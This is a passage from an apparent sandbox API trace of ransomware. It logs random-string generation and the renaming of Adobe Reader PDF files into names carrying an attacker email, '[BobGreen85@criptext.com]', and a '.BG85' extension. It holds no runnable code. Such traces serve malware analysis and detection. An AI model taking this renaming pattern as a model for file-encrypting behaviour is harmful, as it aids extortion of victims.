cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="t") returned 1 [0077.070] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="Z") returned 1 [0077.070] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0077.071] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\esp\\adobeid.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP\\[BobGreen85@criptext.com].CLlrcJ85-PvGiDtZl.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\esp\\[bobgreen85@criptext.com].cllrcj85-pvgidtzl.bg85"), dwFlags=0x1) returned 1 [0077.435] GetTickCount () returned 0x114b9fd [0077.435] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19777380956) returned 1 [0077.435] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0077.435] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0077.435] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="7") returned 1 [0077.435] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="B") returned 1 [0077.435] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="D") returned 1 [0077.435] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="M") returned 1 [0077.435] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="J") returned 1 [0077.436] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="q") returned 1 [0077.436] GetTickCount () returned 0x114b9fd [0077.436] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19777466591) returned 1 [0077.436] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="J") returned 1 [0077.436] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="R") returned 1 [0077.436] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="0") returned 1 [0077.436] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="a") returned 1 [0077.436] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0077.436] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="6") returned 1 [0077.437] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="H") returned 1 [0077.437] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="D") returned 1 [0077.437] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\dynamic.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\[BobGreen85@criptext.com].m87BDMJq-JR0az6HD.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\[bobgreen85@criptext.com].m87bdmjq-jr0az6hd.bg85"), dwFlags=0x1) returned 1 [0077.438] GetTickCount () returned 0x114ba0c [0077.438] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19777699720) returned 1 [0077.438] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="k") returned 1 [0077.438] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="U") returned 1 [0077.438] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="E") returned 1 [0077.438] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Y") returned 1 [0077.438] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="5") returned 1 [0077.439] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0077.439] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0077.439] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="b") returned 1 [0077.439] GetTickCount () returned 0x114ba0c [0077.439] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19777788363) returned 1 [0077.439] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="u") returned 1 [0077.439] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="w") returned 1 [0077.439] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="p") returned 1 [0077.439] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0077.439] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="M") returned 1 [0077.439] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="T") returned 1 [0077.440] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="4") returned 1 [0077.440] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0077.440] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\jpn\\standardbusiness.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\[BobGreen85@criptext.com].kUEY5z8b-uwpzMT4C.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\jpn\\[bobgreen85@criptext.com].kuey5z8b-uwpzmt4c.bg85"), dwFlags=0x1) returned 1 [0077.441] GetTickCount () returned 0x114ba0c [0077.441] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19777991265) returned 1 [0077.441] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="o") returned 1 [0077.441] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="t") returned 1 [0077.441] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="M") returned 1 [0077.441] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="L") returned 1 [0077.441] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="r") returned 1 [0077.441] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="y") returned 1 [0077.442] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="w") returned 1 [0077.442] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Y") returned 1 [0077.442] GetTickCount () returned 0x114ba0c [0077.442] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19778071282) returned 1 [0077.442] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="r") returned 1 [0077.442] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="j") returned 1 [0077.442] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="6") returned 1 [0077.442] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="y") returned 1 [0077.442] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="0") returned 1 [0077.442] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0077.442] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="v") returned 1 [0077.442] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0077.442] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nor\\signhere.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\[BobGreen85@criptext.com].otMLrywY-rj6y08vC.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nor\\[bobgreen85@criptext.com].otmlrywy-rj6y08vc.bg85"), dwFlags=0x1) returned 1 [0077.444] GetTickCount () returned 0x114ba0c [0077.444] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19778327743) returned 1 [0077.444] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="9") returned 1 [0077.445] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="0") returned 1 [0077.445] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="S") returned 1 [0077.445] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Y") returned 1 [0077.445] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="A") returned 1 [0077.445] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="i") returned 1 [0077.445] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="I") returned 1 [0077.445] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="4") returned 1 [0077.445] GetTickCount () returned 0x114ba0c [0077.445] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19778415697) returned 1 [0077.445] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="d") returned 1 [0077.445] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="u") returned 1 [0077.445] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="r") returned 1 [0077.446] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0077.446] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="J") returned 1 [0077.446] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="3") returned 1 [0077.446] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="B") returned 1 [0077.446] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="J") returned 1 [0077.446] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cze\\dynamic.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\[BobGreen85@criptext.com].90SYAiI4-durmJ3BJ.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cze\\[bobgreen85@criptext.com].90syaii4-durmj3bj.bg85"), dwFlags=0x1) returned 1 [0077.447] GetTickCount () returned 0x114ba0c [0077.447] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19778591421) returned 1 [0077.447] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="i") returned 1 [0077.447] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="y") returned 1 [0077.447] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="x") returned 1 [0077.447] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="G") returned 1 [0077.447] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="H") returned 1 [0077.448] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0077.448] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="S") returned 1 [0077.448] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Q") returned 1 [0077.448] GetTickCount () returned 0x114ba0c [0077.448] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19778678929) returned 1 [0077.448] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="V") returned 1 [0077.448] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="7") returned 1 [0077.448] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="t") returned 1 [0077.448] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="c") returned 1 [0077.448] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="n") returned 1 [0077.448] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="x") returned 1 [0077.448] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="u") returned 1 [0077.448] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="D") returned 1 [0077.449] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ita\\adobeid.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA\\[BobGreen85@criptext.com].iyxGHCSQ-V7tcnxuD.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ita\\[bobgreen85@criptext.com].iyxghcsq-v7tcnxud.bg85"), dwFlags=0x1) returned 1 [0078.059] GetTickCount () returned 0x114ba99 [0078.059] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19839786337) returned 1 [0078.059] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="s") returned 1 [0078.059] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="T") returned 1 [0078.059] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="U") returned 1 [0078.059] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="K") returned 1 [0078.059] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="t") returned 1 [0078.059] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="D") returned 1 [0078.059] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="A") returned 1 [0078.059] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Q") returned 1 [0078.060] GetTickCount () returned 0x114ba99 [0078.060] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19839854841) returned 1 [0078.060] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="P") returned 1 [0078.060] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="7") returned 1 [0078.060] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0078.060] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="u") returned 1 [0078.060] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="j") returned 1 [0078.060] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="i") returned 1 [0078.060] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0078.060] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="x") returned 1 [0078.060] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\pointers.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\[BobGreen85@criptext.com].sTUKtDAQ-P7Cuji8x.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\[bobgreen85@criptext.com].stuktdaq-p7cuji8x.bg85"), dwFlags=0x1) returned 1 [0078.095] GetTickCount () returned 0x114bac8 [0078.096] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19843455785) returned 1 [0078.096] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="5") returned 1 [0078.096] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="S") returned 1 [0078.096] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, 